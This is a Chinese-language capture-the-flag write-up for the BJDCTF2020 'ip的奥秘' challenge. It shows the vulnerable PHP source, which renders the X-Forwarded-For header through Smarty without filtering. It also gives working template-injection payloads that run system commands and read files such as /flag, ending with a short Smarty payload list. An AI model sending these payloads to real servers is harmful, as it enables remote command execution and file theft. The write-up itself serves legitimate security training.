BJDCTF2020-ip的奥秘

发表于2021-04-12更新于2021-04-12阅读次数

1. 首页

点击Hint提示,查看源码

1
2
<!-- Do you know why i know your ip? -->
//提示可能与IP有关,输出内容在IP这个接口位置

2. 抓包拦截

尝试XFF模板注入

1
X-Forwarded-for:text

存在模板注入

1
X-Forwarded-for:127.0.0.1{{system('ls')}}

1
X-Forwarded-for:127.0.0.1{{system('cat /flag')}}

3. 分析SSTI注入

现在再来分析flag.php这个文件来判断注入点

1
X-Forwarded-for:127.0.0.1{{system('cat flag.php')}}

源码:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
<?php
    	require_once('header.php');
		require_once('./libs/Smarty.class.php');
		$smarty = new Smarty();
		if (!empty($_SERVER['HTTP_CLIENT_IP'])) 
		{
		    $ip=$_SERVER['HTTP_CLIENT_IP'];
		}
		elseif (!empty($_SERVER['HTTP_X_FORWARDED_FOR']))
		{
		    $ip=$_SERVER['HTTP_X_FORWARDED_FOR'];
		}
		else
		{
		    $ip=$_SERVER['REMOTE_ADDR'];
		}
		//$your_ip = $smarty->display("string:".$ip);
		echo "<div class=\"container panel1\">
					<div class=\"row\">
					<div class=\"col-md-4\">	
					</div>
					<div class=\"col-md-4\">
					<div class=\"jumbotron pan\">
						<div class=\"form-group log\">
							<label><h2>Your IP is : ";
		$smarty->display("string:".$ip);
		echo "				</h2></label>
						</div>		
					</div>
					</div>
					<div class=\"col-md-4\">	
					</div>
					</div>
				</div>";
	?>

形成SSTI注入点在这:

1
$smarty->display("string:".$ip);

这里没做过滤使用了smarty引擎直接显示。

4. Smart注入

1
2
3
4
5
6
7
smarty注入payload

{if phpinfo()}{/if}
{if system('ls')}{/if}
{readfile('/flag')}
{if show_source('/flag')}{/if}
{if system('cat ../../../flag')}{/if}